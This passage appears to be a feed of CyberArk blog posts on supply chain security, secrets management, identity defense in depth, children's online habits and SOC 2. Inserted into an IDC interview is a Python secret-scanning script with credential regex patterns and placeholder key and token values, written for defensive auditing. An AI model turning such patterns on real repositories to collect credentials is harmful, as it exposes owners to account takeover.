Today’s announcement is a significant milestone in CyberArk’s FedRAMP journey toward the High-level “Authorized to Operate” distinction held by only 42 organizations today. With this authorization, CyberArk will be uniquely positioned to help federal agencies secure access to critical data and infrastructure, protect distributed workforces and accelerate cloud innovation.

CyberArk FedRAMP High Details

Question, Confirm and Trust — Be Supplier Smart

Highly interconnected information and communications technology (ICT) supply chains deliver critical products and services to both public and private sectors. Yet continued cyber attacks show that an organization’s supply chain is only as strong as its weakest link. This National Supply Chain Integrity Month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Office of the Director of National Intelligence (ODNI) and other government and industry partners are calling for organizations to “Be Supplier Smart” as part of a unified effort to #FortifytheChain.

Cyber attackers know that the best way to gain access to a particular target — whether it’s a global enterprise, a government agency or critical infrastructure — is often through a third-party vendor or supplier. Taking steps to ensure the trustworthiness of your organization’s vendors and suppliers is a key aspect of managing supply chain risk.

CISA, ODNI and the newly established ICT Supply Chain Risk Management (SCRM) Task Force emphasize the need for organizations to conduct robust due diligence when selecting third-party providers, understand their cybersecurity practices, and establish and enforce standards throughout the lifecycle of a product or service. They’ve created a set of tools to help organizations ease third-party supplier evaluation processes, including recommendations on using qualified bidder lists to enhance supply chain security.

Authors note that “Establishing and utilizing vetted, qualified sources of supplies can limit an organization’s exposure to risk,” providing examples of widely recognized standards that organizations across all sectors can consider when building their own qualified lists, including FedRAMP for secure cloud services. 

A Proven, Trusted Partner for Critical Cybersecurity Initiatives

Attackers continue to innovate, looking for new ways to exploit vulnerabilities and compromise identities deep in the supply chain to launch their attacks, then work to gain access to sensitive assets further down the chain.

As your organization works to strengthen the security of its supplier ecosystem with qualified third-party entities, see why government agencies and enterprises worldwide trust CyberArk’s proven SaaS-based Identity Security solutions to secure all identities from end to end to protect their most valuable assets.

]]>
Secrets Management to Protect the Software Supply Chain: A Q&A with IDC’s Jim Mercer https://www.cyberark.com/blog/secrets-management-to-protect-the-software-supply-chain-a-qa-with-idcs-jim-mercer/ Tue, 26 Apr 2022 11:14:27 +0000 https://www.cyberark.com/?p=130525 Secrets Management to Protect the Software Supply Chain: A Q&A with IDC’s Jim Mercer

Governments and intelligence agencies continue to emphasize technology providers’ critical role in strengthening cybersecurity and supply chain resilience for the long run. In fact, the Biden Administration’s recent call to “bake security in, don’t bolt it on” could serve as the DevSecOps mission statement.

Managing the secrets used by applications, scripts and other non-human identities across DevOps environments and CI/CD pipelines is widely considered fundamental to “shifting security left” — especially as non-human identities outnumber human ones by a factor of 45 in the average enterprise.

So how are organizations tackling secrets management as they move toward DevSecOps maturity? What do they see as major benefits, challenges and priorities? To take a pulse, IDC recently conducted a global survey of more than 400 cybersecurity, DevOps and IT practitioners at organizations with at least 1,000 employees. To explore the results of the research summarized in the IDC InfoBrief, “Managing Application Secrets Across the Enterprise,” we spoke with author and IDC Research Director for DevOps and DevSecOps Jim Mercer. The following are his perspectives on key findings.

Let’s start with a definition: what exactly is “secrets management” in your view?

IDC defines secrets management as the processes used to manage digital authentication and identification (i.e., secrets) within applications, including passwords, encryption keys, application programming interfaces (APIs), certificates and tokens.

Secrets are essentially “digital keys” that unlock doors to valuable corporate data, so protecting them within applications, on developer workstations, on admin consoles and everywhere else across the development environment is key.

It was encouraging to see secrets management ranked as the No. 1 priority for organizations over the next year to improve the security of application development environments. But the fact that 71% said their current approach for securing the software supply chain leaves them susceptible to cyber attacks suggests there is still work to be done.

The White House recently urged technology organizations to only develop applications on systems that are “highly secure and accessible only to those actually working on a particular project,” noting that “this will make it much harder for an intruder to jump from system to system and compromise a product or steal your intellectual property.” How can secrets management help with this?

In the context of application development, secrets management provides assurance that resources across stacks, platforms and the cloud can only be accessed by authenticated and authorized identities.

By removing secrets from code and other unprotected areas, secrets management solutions can help protect secrets and other credentials from being stolen or compromised. And by enforcing the principle of least privilege and rotating and monitoring credentials, secrets management makes it harder for threat actors to move through an environment and gain the privileged access needed to progress their attacks.

It should be obvious to say that “all secrets must be protected,” but why does this still prove to be a challenge for many organizations?

Because secrets are everywhere. And as an organization’s applications and infrastructure continue to constantly evolve, new secrets are created and are stored in various places — often with little tracking and varying levels of security. This “secrets sprawl” only gets worse over time, especially as cloud-native app development increases. Managing secrets with disparate tools creates even greater complexity from both a security and compliance standpoint, as secrets get stored in duplicate locations or are missed altogether.

Our survey found a direct correlation between organizations’ DevSecOps maturity level and their secrets management approach: 91% of DevSecOps early adopters use secrets managed by individual teams, which tends to create more sprawl and makes it difficult to establish and share security best practices. Meanwhile, 94% of DevSecOps leaders embrace a centralized approach to secrets management.
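As an added example (not IDC's or CyberArk's code), the following Python script illustrates two points from the answers above: a scanner that finds credentials committed in source and configuration files, the "secrets sprawl" the interview describes, and the hardened run-time lookup that replaces them once secrets are moved into a secrets manager. The sample files, the credential patterns, the placeholder token values and the entropy threshold are all constructed for illustration.

```python
"""Hard-coded secret finder plus the hardened retrieval pattern (added example)."""
import math
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Mapping, Optional

# Constructed sample repository contents: the values are placeholders, not real keys.
SAMPLE_FILES: Dict[str, str] = {
    "app/config.py": 'DB_PASSWORD = "Sup3rS3cretPassw0rd!"\nDEBUG = True\n',
    "deploy/aws.env": "AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE01\nREGION=us-east-1\n",
    "ci/pipeline.yml": "  token: ghp_aB3dE5fG7hI9jK1lM3nO5pQ7rS9tU1vW3xY5\n",
    "src/util.py": 'API_KEY = os.environ["API_KEY"]\nTIMEOUT = 30\n',
}

# Credential shapes to look for (assumption: illustrative, not an exhaustive rule set).
# Specific formats come first so a line is reported under its most precise kind.
PATTERNS = [
    ("aws_access_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("assignment", re.compile(
        r"(?i)(password|passwd|secret|api_key|token)\s*[:=]\s*['\"]?([^'\"\s]{8,})")),
]
ENTROPY_THRESHOLD = 3.0  # bits per character; below this a value is likely a plain word


@dataclass
class Finding:
    path: str
    lineno: int
    kind: str
    masked: str  # only a prefix of the value is kept, so reports do not leak the secret


def shannon_entropy(value: str) -> float:
    """Bits per character; random-looking credentials score higher than words."""
    if not value:
        return 0.0
    counts = {ch: value.count(ch) for ch in set(value)}
    return -sum((n / len(value)) * math.log2(n / len(value)) for n in counts.values())


def mask(value: str) -> str:
    return value[:4] + "..."


def is_env_lookup(line: str) -> bool:
    """A line that resolves the secret at run time commits nothing to the repo."""
    return "os.environ" in line or "getenv" in line


def scan_text(path: str, text: str) -> List[Finding]:
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if is_env_lookup(line):
            continue
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            # The credential itself is the last capture group, or the whole match.
            value = match.group(match.lastindex) if match.lastindex else match.group(0)
            if kind == "assignment" and shannon_entropy(value) < ENTROPY_THRESHOLD:
                break  # low-entropy value: probably a placeholder, not a credential
            findings.append(Finding(path, lineno, kind, mask(value)))
            break  # one finding per line is enough for triage
    return findings


def scan_repo(files: Mapping[str, str]) -> List[Finding]:
    """Scan every file in the mapping and collect all findings."""
    results: List[Finding] = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return results


def get_secret(name: str, env: Optional[Mapping[str, str]] = None) -> str:
    """Hardened replacement for a hard-coded value.

    The secret is injected into the process environment by the secrets manager
    integration in the pipeline (assumed), so nothing is committed, and the
    value is never written to logs or error messages.
    """
    source = os.environ if env is None else env
    value = source.get(name, "")
    if not value:
        raise RuntimeError(
            f"secret {name!r} was not injected; check the pipeline's secrets integration")
    return value


if __name__ == "__main__":
    for f in scan_repo(SAMPLE_FILES):
        print(f"{f.path}:{f.lineno}: {f.kind} ({f.masked})")
```

Running the script reports the three committed credentials and stays silent on src/util.py, which already resolves its key at run time.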

What is the biggest hurdle organizations face in integrating security, including secrets management, into application development?

Our survey revealed a continued lack of collaboration between DevOps and security teams, and 66% of organizations admitted to experiencing avoidable mistakes as a result. 

To bridge this gap, effort is needed on both sides. DevOps teams need to proactively include security teams, rather than waiting to get them involved just before code goes live. Forty-two percent admitted security stakeholders are rarely included in planning discussions about secrets management. Likewise, security teams need to contribute by getting up to speed on secrets management — a subject 50% of cloud infrastructure VPs said is not well understood by security.

Small steps can lead to big changes over time. Consider creating agile “birds of a feather” and “coffee chat” groups focused on application security and secrets management to bring teams together.

How can security teams make it easy for developers to “do the right thing” when it comes to secrets management?

When developers are empowered with the right security tools, they will take ownership of security. Based on our survey findings, developers want secrets management tools that are easy to use, can integrate seamlessly into the DevOps pipeline and offer self-service capabilities.

What key areas of secrets management do organizations want to improve?

Respondents ranked support for modern hybrid and multi-cloud environments and integration with Identity and Access Management (IAM) and Privileged Access Management (PAM) solutions as their top two areas of improvement over the next two years.

They’re also looking to up-level their existing secrets management approaches with enterprise-class capabilities, with particular emphasis on support for hybrid and multi-cloud environments.

Get more secrets management insights to protect the software supply chain

Software supply chain attacks can be multi-layered — involving several interim steps or vectors. But the ultimate goal is almost always the same: compromise identities by stealing secrets and credentials and escalating privileges to reach valuable corporate assets.

A fundamental component of a defense-in-depth approach is securing identities throughout the application development environment — including cloud-native applications — with secrets management. When approached holistically and collaboratively, secrets management can help improve operational efficiency (38%), reduce the risk of secrets leaks (41%) and accelerate the adoption of DevSecOps (39%), said survey respondents.

Get more secrets management insights from enterprise teams by reading the IDC InfoBrief, sponsored by CyberArk, “Managing Application Secrets Across the Enterprise,” IDC Doc. #US48924522, March 2022.

4 Ways to Strengthen Your Identity Provider with Defense in Depth https://www.cyberark.com/blog/4-ways-to-strengthen-your-identity-provider-with-defense-in-depth/ Wed, 20 Apr 2022 13:00:29 +0000 https://www.cyberark.com/?p=130377 4 Ways to Strengthen Your Identity Provider with Defense in Depth

Some of the world’s most technologically advanced enterprises have grappled with identity-related breaches in recent months. These incidents have further highlighted how digital identities have come to simultaneously represent today’s greatest cybersecurity challenge and the core of modern enterprise security.

It’s become clear that a holistic, all-hands-on-deck approach is required to stay ahead of attackers and make it more difficult for them to succeed.

We recently explored key steps for mitigating risk if your Identity Provider (IdP) is compromised. Today’s post will take this a step further, illustrating four specific ways in which a security-first, defense in depth strategy can help organizations better protect their data, users and customers by layering Identity Security controls over baseline IdP deployments — no matter which platform or various integrated technologies are in play.

Use Case #1. Protecting endpoints and enforcing the principle of least privilege

Defense in Depth for Endpoints

A defense-in-depth approach promotes strong multi-factor authentication (MFA) at the endpoint — beginning with the login process, which should require two separate authentication methods for entry, such as a password and a one-time-password (OTP).

Ideally, user accounts should not have local admin rights, making tasks such as changing system configurations, installing software or changing account settings off limits. When a user requires elevated privileges to execute an administrative action or launch a sensitive application, they should be prompted by MFA to validate their identity again before being granted just-in-time access to the resources they need, for just the right amount of time.

Enforcing context-aware, risk-based MFA and least privilege on the endpoint helps to prevent attackers from gaining a foothold within an organization, launching ransomware and other user-based attacks and jump-starting a cascade of reconnaissance activities and lateral movement.

Use Case #2. Monitoring and auditing high-risk web application sessions

Defense in Depth for Web Sessions

Nearly 80% of organizations report employee misuse or abuse of access to business applications. As more high-value data migrates to the cloud, a defense-in-depth approach is critical for managing web-application risk.

This starts by extending existing Single Sign-On capabilities to validate users at the beginning and during each session and enforcing global time-outs to minimize risk, such as when a user steps away from a device during a session. Implementing step-by-step session recording and monitoring within protected applications allows organizations to easily search for and audit actions — without impacting the user experience. To further protect sensitive data residing in applications, organizations can also choose to restrict data exfiltration actions, such as copying data and downloading files, and further limit individual user or application permissions based on specific needs and requirements.

Use Case #3. Storing and sharing credentials for password-based business apps and other sensitive data

Defense in Depth for Credentials

According to The CyberArk 2022 Identity Security Threat Landscape Report, credential access is the No. 1 area of risk for organizations today. Credentials are universally sought after as a means to compromise identities and launch attacks. Despite the widely known risks, business users are often left to manage credentials on their own — a major hassle that results in weak or reused passwords, credentials stored in plain text files, Excel spreadsheets or browsers, or the use of disparate password managers that limit security’s visibility and control.

A defense-in-depth approach can help eliminate password pains for business apps and other sensitive data, while boosting the overall user experience. By deploying a centralized vault-based storage system and making it accessible via passwordless authentication, an employee can simply log in using an MFA QR code, for example, and then seamlessly add passwords, license numbers, encryption keys and other valuable data to the vault, securely accessing and sharing them with other users with a click of a button.

Use Case #4. Providing secure third-party privileged access to critical internal resources

Defense in Depth Third Party Access

More than 96% of organizations allow third-party access to critical systems today. To perform their intended tasks, these authorized third parties require rapid and secure provisioning/de-provisioning of privileged access to specific corporate IT systems. The challenge for organizations is to do so efficiently, securely and in compliance with a growing body of regulations.

Third-party policies must mirror established Zero Trust policies for internal employees, such as authenticating each time they require access. An effective defense-in-depth approach will allow vendors to bring their own decentralized identity to gain access to privileged resources via a universal portal — enabling simple yet secure authentication and providing vendor managers the ability to manage their own users’ access.

To improve security posture and reduce complexity, dynamic, just-in-time provisioning to privileged accounts can be granted on the fly for specific reasons and for specific amounts of time. Doing so without the need for passwords, tokens and network-based access controls further reduces the attack surface. And by enabling full session isolation, real-time monitoring and audit, organizations can increase their visibility into vendor activity — critical for reducing supply chain risks.

Close IdP Gaps with a Security-First, Defense-in-Depth Approach

No matter your organization’s industry or size, security matters. Take the time to evaluate your digital identity landscape for potential gaps and learn how a defense in depth approach can help address security vulnerabilities and provide additional assurances. Then, with a clear understanding of where you are today, prioritize Identity Security controls to help your organization get to where you want to be.

Explore lessons we can all learn from incidents targeting a critical security layer. And for more details on deploying CyberArk solutions alongside your current IdP to cover your Identity Security bases, tune in to the on-demand webinar “How to Leverage Defense in Depth to Minimize Risk.”

Kids Talk Cybersecurity, Online Habits and Growing Up in the Digital World https://www.cyberark.com/blog/kids-talk-cybersecurity-online-habits-and-growing-up-in-the-digital-world/ Thu, 14 Apr 2022 13:00:42 +0000 https://www.cyberark.com/?p=130011 Kids Talk Cybersecurity, Online Habits and Growing Up in the Digital World

Those of us who “came of age with the internet” had the luxury of testing the digital waters slowly — waiting for the dial-up modem to screech to life once or twice a week and slowly tapping out one-line T9 text messages. Technology played a relatively minor role in those quaint, formative years. But fast-forward a few (cough) decades, and most kids have mastered the touchscreen before their second birthday. But have they mastered cybersecurity basics as readily?

The internet touches virtually every aspect of modern life, simultaneously reflecting the best and worst parts of humanity. Helping kids navigate the digital world safely is a thorny challenge for many parents and caregivers today. In fact, a recent Google survey found that two in five parents don’t feel confident talking about tech-related topics with their kids, such as screen time, digital wellbeing and discovering quality apps, games and activities.

In the spirit of encouraging more frequent, candid conversations about responsible technology use, we went straight to the source. Some of what we heard from these digital natives buoyed our cybersecure-spirits, while other statements were somewhat alarming (albeit age appropriate).

Here’s what we learned about cybersecurity awareness and online habits in speaking with kids aged two to 16 (note: some names have been changed to protect privacy):

Turns out that passwords can be a pain for everyone — regardless of age. Some of the kids we spoke to admitted to risky password practices that, if not addressed, could potentially become bigger problems down the line.

What are passwords used for?

“You use them to call your friends’ parents to ask for a playdate.” – Jack, 5

“Passwords stop people from sneaking on your phone.” – Finn, 8

What makes a strong password?

“Capital and lowercase letters, numbers and special characters. You shouldn’t use obvious personal info such as your name.” – Ben, 13

How do you remember your passwords?

“I’m just always going to use my mom’s password for everything, so I don’t forget it (proceeds to share it with everyone in the room).” – Lucas, 10

“My e-mail password has never been changed since I first made my account.” – Tim, 13

“I usually remember all my passwords because they are pretty similar to each other. I have two passwords that I use and have slight variations to each of them.” – Maya, 16

Some kids have taken common-sense precautions, such as enabling multi-factor biometric authentication, recognizing that passwords are not enough to protect key accounts like email, banking and social media.

“My phone is locked, and I can use a six-digit passcode or my Face ID to unlock it.” – Ben, 13

“I have a locked note in the notes app where I write all of my passwords.” – Jordan, 15

We asked kids about their family technology rules, potential cyber risks and making smart choices online. 

When are you allowed to use your tablet?

“On the couch.” – Paige, 2

“When my mom says it’s okay.” – Jack, 5

How do you make sure a website is safe before using it?

“I usually use my own intuition to determine whether a website is safe. If the website is .edu or .gov I usually can assume it is a reputable source. If I am online shopping on a site I’ve never used before, I will usually look at their privacy policy or look the website up to see if it is safe to give my personal information and credit card to them.” – Jordan, 15

“I usually look at the ending of the website title. For example, if the website ends in .org or .com, I usually assume that the website will be safe. In addition, I usually stick to the websites that appear at the top when I search for something, because those are the most commonly visited by other people.” – Maya, 16

Are you concerned that your online accounts could be compromised?

“I know it is definitely a possibility because I know lots of kids my age who’ve been hacked. But I know if I stay careful on the internet and learn from other people’s mistakes, I can likely stay safe on the internet.” – Tim, 13

“Sometimes I am concerned about my Instagram being hacked, so I change the password very often — around once a month. I am worried about this because I know many people who have had their accounts hacked before.” – Jordan, 15

Have you or someone in your family ever been scammed?

“I have been hacked twice. The first time I was hacked was when someone sent me a link and it asked me to put my Instagram username and password in to access the link. Because I was in middle school, I didn’t really think much of it. I ended up being hacked, and my account sent over 100 DMs to people. The second time I got hacked was recently, through my bank account. I’m still not sure how it happened, but someone got access to my online bank account and took most of my money out. In both of these cases, I changed my passwords to be more complex. Additionally, for the bank situation I spent a lot of time talking to people on the phone, and I had to get a new debit card. I think from these situations I have learned to be extra cautious on the internet and have made sure not to give my passwords to any website that may be untrustworthy.” – Maya, 16

Children of all ages want to participate in the digital world. In their own words, the best part of the internet is…

“Minecraft!” – Colton, 9

“How quickly you can obtain information with a quick search, and oftentimes that information can be helpful for a project, directions to a location or just pure curiosity.” – Ben, 13

“That you have access to a variety of things, people and ideas. The internet is such a big place, and it allows you to learn about the people and the world around you.” – Becca, 15

They also understand some of the potential risks, such as: 

“Malware, which is something that can damage your computer.” – Lucas, 10

“The people who try to trick you to receive your information and passwords.” – Jordan, 15

“Cyber bullying.” – Lucy, 11

“The danger of being stalked by someone or having your location tracked or someone stealing your identity.” – Ben, 13

“I think that it is very easy to come across bad people or things on the internet.” – Becca, 15

Home is a great place to start building lifelong cyber safety skills — from keeping devices updated and “clean,” to protecting personal information, to being cautious about sharing information on social media. Yet Google’s survey found that one in four parents has not proactively spoken to their kids about online safety over the past year.

It can be challenging to know where to start but fortunately, there are some great resources available to help get the conversation about online safety going. Here are just a few of our favorites:

A Platform for Good: Teaching Effective Security Habits at Home

Common Sense Media: Cyberbullying Resources for Parents

Family Online Safety Institute: Digital Parenting Resources

Federal Trade Commission: OnGuardOnline

Internetmatters.org: Helping Parents Keep Their Kids Safe Online

National Cybersecurity Alliance: Stay Safe Online Resource Library

U.S. Department of Justice: Keeping Children Safe Online

UNICEF: Growing Up in a Connected World

How Digital Identities Drive Cybersecurity Debt, the Hidden Transformation Trade-Off https://www.cyberark.com/blog/how-digital-identities-drive-cybersecurity-debt-the-hidden-transformation-trade-off/ Tue, 12 Apr 2022 10:00:53 +0000 https://www.cyberark.com/?p=129738 Cybersecurity Debt Digital Identities

Many cybersecurity concepts are complex and often difficult to explain to non-technical audiences. Kerberoasting? Golden SAML? Huh? This can make it challenging for security leaders to communicate urgency and gain stakeholder support for important projects.

Educating business stakeholders and consumers on the importance of securing personal and professional digital identities is precisely why Identity Management Day (#IDMgmtDay2022) was established by the Identity Defined Security Alliance (IDSA) and National Cybersecurity Alliance. As you embark on awareness-building initiatives this April 12, consider framing the growing digital identity problem in terms of “debt” — a concept that’s as universally understood as it is dreaded.

Based on findings from The CyberArk 2022 Identity Security Threat Landscape Report,* which was released today, many organizations are heading deeper into cybersecurity debt by prioritizing digital initiatives, such as accelerating cloud migration, developing new digital services and supporting work from anywhere models, while putting off identity-focused security protections.

Rising Cybersecurity Debt Can Hamstring Innovation and Future Success

Whether it’s splurging on a big vacation, buying a new home or launching a new interactive app for your customers, you take on debt to get something you need (or want) today by deferring “payment” until tomorrow. But, as the saying goes, “Debt is like any other trap: easy enough to get into but hard enough to get out of.”

Cybersecurity debt is a type of technical debt — a term first introduced by computer programmer Ward Cunningham to explain the future cost of reworking a solution that wasn’t completely or properly designed from the start. Cybersecurity debt specifically refers to the unaddressed security vulnerabilities that accumulate in an organization’s IT environment as new systems and technologies are added over time. When cybersecurity debt isn’t paid off promptly (in other words, if security issues aren’t addressed right away), “interest” can quickly build, making it difficult and costly to repair those shortcuts down the road.

Getting bogged down in cybersecurity debt ultimately leaves fewer dedicated resources for sustaining a productive and efficient business.

The Enterprise Digital Transformation Trade-Off

Though volatility remains a top business challenge, standing still is not an option. Nearly every surveyed organization (99%) accelerated a business or IT initiative within the past 12 months in the push for continued resiliency and competitive differentiation.

But transformative projects are rarely achieved without making waves, especially when it comes to large-scale technology initiatives. Each one creates a massive swath of new interconnected digital identities — the virtual ID cards of cyber space — each containing credentials of the human or machine linked to it. These digital identities are used to facilitate interactions and broker access, often to sensitive corporate data and assets required to perform a job or function.

Enterprise Digital Identities at a Glance

A High-Interest Digital Identity Debt Dilemma

It takes just one compromised identity for a threat actor or malicious insider to launch an attack and start escalating privileges to move deeper into an environment in search of valuable assets. This is likely why respondents ranked credential access as their No. 1 area of risk. Yet 79% said their organization hasn’t prioritized the protection of critical data and assets. Instead, they’re moving full steam ahead with initiatives respondents said could introduce significant risk.

This dissonance has created substantial cybersecurity debt that continues to mount as “interest” accumulates in the form of new unmanaged identities across every major IT infrastructure component.

Identity Security controls were largely absent from key IT environments

This Identity Management Day, Create a Feasible Pay-Off Plan to Tackle Cybersecurity Debt

As in our personal lives, a certain level of debt is sometimes necessary. If your car dies and you need one to get to and from work, you may be forced to take out a loan. Likewise, many organizations had no choice but to fast-track projects that could keep operations running amid pandemic-driven challenges, making some security trade-offs along the way.

The key now is to tackle this debt responsibly before balances become too unwieldy, or worse, organizations face “bankruptcy” for failing to evolve at the rate of technology change due to poor security decisions.

To their credit, some respondents have committed to turning things around. Notably, almost all respondents are embracing Zero Trust cybersecurity models of “trust nothing; verify everything,” with half (50%) of them prioritizing Identity Security tool implementation as one of their top three initiatives to pave the way.

And in the face of continued ransomware attacks and other emerging threats, they’re approaching cybersecurity debt and risk reduction efforts more holistically — not only emphasizing important technical controls such as multi-factor authentication (MFA) and least privilege but also people-centric initiatives such as security awareness training to embed security-conscious behavior into their cultures. This defense-in-depth approach reflects a widespread “assume breach” mentality, which 82% of respondents say they’ve embraced.

Digging out of cybersecurity debt takes time and for many organizations, there’s much work to be done. Creating a risk-based plan can help them identify ways to make quick, high-return “payments” and then follow a feasible timeline for reducing the remaining cybersecurity debt. With a solid identity-centric risk plan in place, organizations can effectively strengthen defenses against emerging threats while advancing key initiatives to propel their business forward.

To learn more, download The CyberArk 2022 Identity Security Threat Landscape Report.

*The CyberArk 2022 Identity Security Threat Landscape Report surveyed 1,750 IT security decision makers worldwide at organizations with at least 500 employees across all private and public sectors.

4 Reasons to “Enroll” at CyberArk University https://www.cyberark.com/blog/4-reasons-to-enroll-at-cyberark-university/ Fri, 08 Apr 2022 13:00:59 +0000 https://www.cyberark.com/?p=129718 CyberArk Training and Certification

CyberArk University is the best place to learn the ins and outs of the CyberArk Identity Security Platform — whether you’re an administrator looking to learn the fundamentals of CyberArk Privileged Access Manager before project kickoff; an implementation expert looking to certify your configuration skills for CyberArk Identity deployments that enable single sign-on (SSO), adaptive multi-factor authentication (MFA) and lifecycle management; or a developer seeking hands-on training in CyberArk Secrets Manager solutions.

For more than seven years, CyberArk University has provided security professionals around the world with the training and skills validation needed to implement and administer CyberArk Identity Security solutions, set teams up for success and help organizations get the most out of their CyberArk investments. Since its inception, more than 100,000 people — from CyberArk customers and partners to CyberArk’s own internal employees — have advanced their cybersecurity skills and knowledge through CyberArk University.

We spoke with Gali Rotem, senior director for global education services at CyberArk, about CyberArk University’s ever-expanding training offerings, exciting new community contributions and four groups that can benefit from this world-class training and certification program.

1. Organizations: Offer compelling training opportunities to help attract and retain cybersecurity talent — and set teams up for success.

According to a newly released ISACA 2022 State of the Cybersecurity Workforce study, 63% of enterprise organizations have unfilled cybersecurity positions today. Competition for skilled workers is fierce, with 60% of organizations reporting retention challenges. More than ever, training, development and upward growth opportunities are critically important to retaining cybersecurity talent. Without them, nearly half (47%) of workers say they would leave a position.

Courses offered through CyberArk University can help supplement internal training programs by teaching security team members valuable skills and best practices for operating CyberArk Identity Security solutions. By deepening their knowledge and technical abilities around this critical layer of security, team members can advance their professional development and validate their expertise — driving increased job satisfaction and retention.

“Customers and partners appreciate the value they get from our classes in supporting their learning journey. We get lots of great feedback, especially for our labs,” says Rotem.

Here’s what some CyberArk University participants had to say:

CyberArk University Testimonials

2. Security practitioners: Grow professionally and stand out in the market for your Identity Security technical expertise. 

Technical security controls experience is one of the top three skills gaps seen in today’s cybersecurity professionals, according to ISACA survey respondents. Training and certification courses offered through CyberArk University’s Public Certification Program can help security practitioners deepen and validate their technical expertise across CyberArk solution areas including Privilege, Access and DevSecOps, and stand out in the market. New courses are added frequently based on community input and interest.

“As the cybersecurity talent shortage continues to impact so many organizations, we’re seeing significant interest in REST API and other automation-focused topics to help teams eliminate manual tasks and amplify their impact,” notes Rotem. CyberArk University offers courses for various skill levels, most of them with customized hands-on labs, that can support career growth within the Identity Security space. Students can use the time spent on these courses for Continuing Professional Education (CPE) credits to maintain other certifications in the field.

Similarly, CyberArk University’s certification exams are designed for various roles and experience levels to help validate CyberArk solution expertise and open doors for additional professional opportunities. Rotem and team are particularly excited about the recent introduction of community-developed exams. “To help ensure certification exams remain up to date and relevant, we work closely with security leaders using CyberArk solutions in their organizations to optimize the exam blueprint and individual questions,” she says.

With flexible learning options available in multiple languages such as German and French — including live classes, on-demand virtual instruction and even a lab environment for hands-on learning — participants can work at their own pace and to the level that best aligns with their job responsibilities and career ambitions.

3. CyberArk consultants and partners: Help customers address their most critical Identity Security challenges and build a competitive edge.

Cybersecurity consultants can take advantage of CyberArk University certifications to validate their competency and advanced skills. Achieving the top certification, CyberArk Guardian, demonstrates their ability to design and execute a multi-phase Identity Security program utilizing CyberArk best practices. As part of this experience, security consultants can further cultivate the soft skills needed to effectively communicate Identity Security concepts to a range of technical and non-technical stakeholders, including those at the executive level — today’s No. 1 skills gap, as identified by ISACA survey participants.

CyberArk partner organizations also rely on the training and resources offered by CyberArk University for optimizing their service delivery practices. “Our CyberArk Partner Certification Program is one of the ways we demonstrate our commitment to enabling and supporting our partners around the world,” says Rotem. Partners who have participated in CyberArk University certification courses and exams and have built extensive expertise in CyberArk solutions can take advantage of differentiated benefits and increased revenue opportunities.

4. Anyone: Access our ever-expanding library of free Identity Security resources and training videos

As digital technology continues to evolve rapidly, many organizations have embraced just-in-time training models for their technical workers. Having access to relevant documents and videos to answer questions on the job, exactly when they’re needed, can help workers save time, remove friction, bridge skills gaps and develop proficiency over time.

“There’s a widely held theory that learners remember 80% of what they watch but just 20% of what they read,” says Rotem. “Our growing library of short, two-minute self-service videos gives learners the resources they need to perform job-related activities safely and confidently.”

If you’re searching for quick, just-in-time Identity Security tips, Rotem recommends visiting the CyberArk University YouTube channel. You’ll find instructional how-to videos on everything from setting up a security key for MFA to adding a new user to CyberArk Cloud Entitlements Manager.

And whether you’re an IT admin eager to hit the ground running, a developer seeking to automate tasks or an end user getting familiar with the benefits of CyberArk solutions, you can swing by CyberArk University or the CyberArk Technical Community to find answers to your Identity Security questions. In the CyberArk Technical Community, customers and partners can ask questions, join discussions, browse by product, find best practice recommendations by functional role and get step-by-step guidance on everything from starting a deployment to upgrading components.

Advancing Skills and Knowledge to Close the Cybersecurity Skills Gap

A strong emphasis on technical training and professional development is critical to closing the global cybersecurity skills gap while helping security workers stay engaged and be the best versions of themselves. “Our team is proud to contribute to this effort through CyberArk University and the Technical Community, empowering customers, partners, employees and community members with meaningful learning opportunities,” concludes Rotem.

]]>
Why SOC 2 Compliance Is a Matter of (Zero) Trust https://www.cyberark.com/blog/why-soc-2-compliance-is-a-matter-of-zero-trust/ Thu, 07 Apr 2022 11:57:37 +0000 https://www.cyberark.com/?p=129705 Why SOC 2 Compliance Is a Matter of (Zero) Trust

SaaS solutions are now so entwined in business users’ daily routines that they seem to meld into one experience — or simply put, “the way I work.” Yet the reality is there are many disparate cloud applications in play across a typical enterprise (364 on average), which means a lot of complexity and risk. That’s why, as organizations expand and accelerate business in the cloud, they’re not just looking at how SaaS solutions can enable them; they’re increasingly focused on potential security impact. And it’s become clear that unprotected or misconfigured data in the hands of an application provider — one link in the interconnected software supply chain — is all it takes to open the door to cyber attacks.

Enter SOC 2. It’s an industry certification that gives SaaS solution providers a verifiable way to demonstrate the security and reliability of their software products, services and practices. Though it’s not mandatory for SaaS providers to be certified, many enterprise customers have added SOC 2 compliance to their must-have list when evaluating potential vendors. If this is the case for your organization, especially if you are one of the many embracing SaaS-delivered security solutions to protect corporate assets and distributed workforces, such accreditations are crucial.

Mapping SOC 2’s Five Principles to Zero Trust

As defined by the American Institute of Certified Public Accountants (AICPA), SOC 2 is a framework used by service providers to audit and report how they manage sensitive customer data. The SOC 2 report focuses on internal controls across five “trust service principles.” Since service providers’ offerings vary, organizations are not required to certify all five areas, as not all of them may be relevant. The security principle is mandatory for a SOC 2 audit — the others are optional. However, some customers may require all five areas to be certified before entering a business relationship.

Here’s a look at how SOC 2’s various technical controls work in support of a broader Zero Trust approach to cybersecurity that encompasses people, processes and technology.

Principle 1: Security

In a Zero Trust model, every identity — human or machine — must be authenticated and authorized with zero exceptions. The SOC 2 security principle evaluates application security design (for both off-the-shelf and custom applications) and specifically, how access to sensitive information — such as personally identifiable information (PII), financial data and intellectual property — is controlled and protected. SOC 2 looks for foundational access controls such as multi-factor authentication (MFA) and intrusion detection, which work together to let users in and keep threats out.

Principle 2: Availability

Customers expect their cloud services to be on and ready to use — any time, every time. This principle evaluates the provider’s ability to keep things up and running by examining performance monitoring capabilities, along with processes in place to respond to security-related incidents, among others. Zero Trust security calls for comprehensive monitoring capabilities so organizations have the complete situational awareness they need to identify threats quickly and respond swiftly and with confidence to minimize exposure.

Principle 3: Processing Integrity

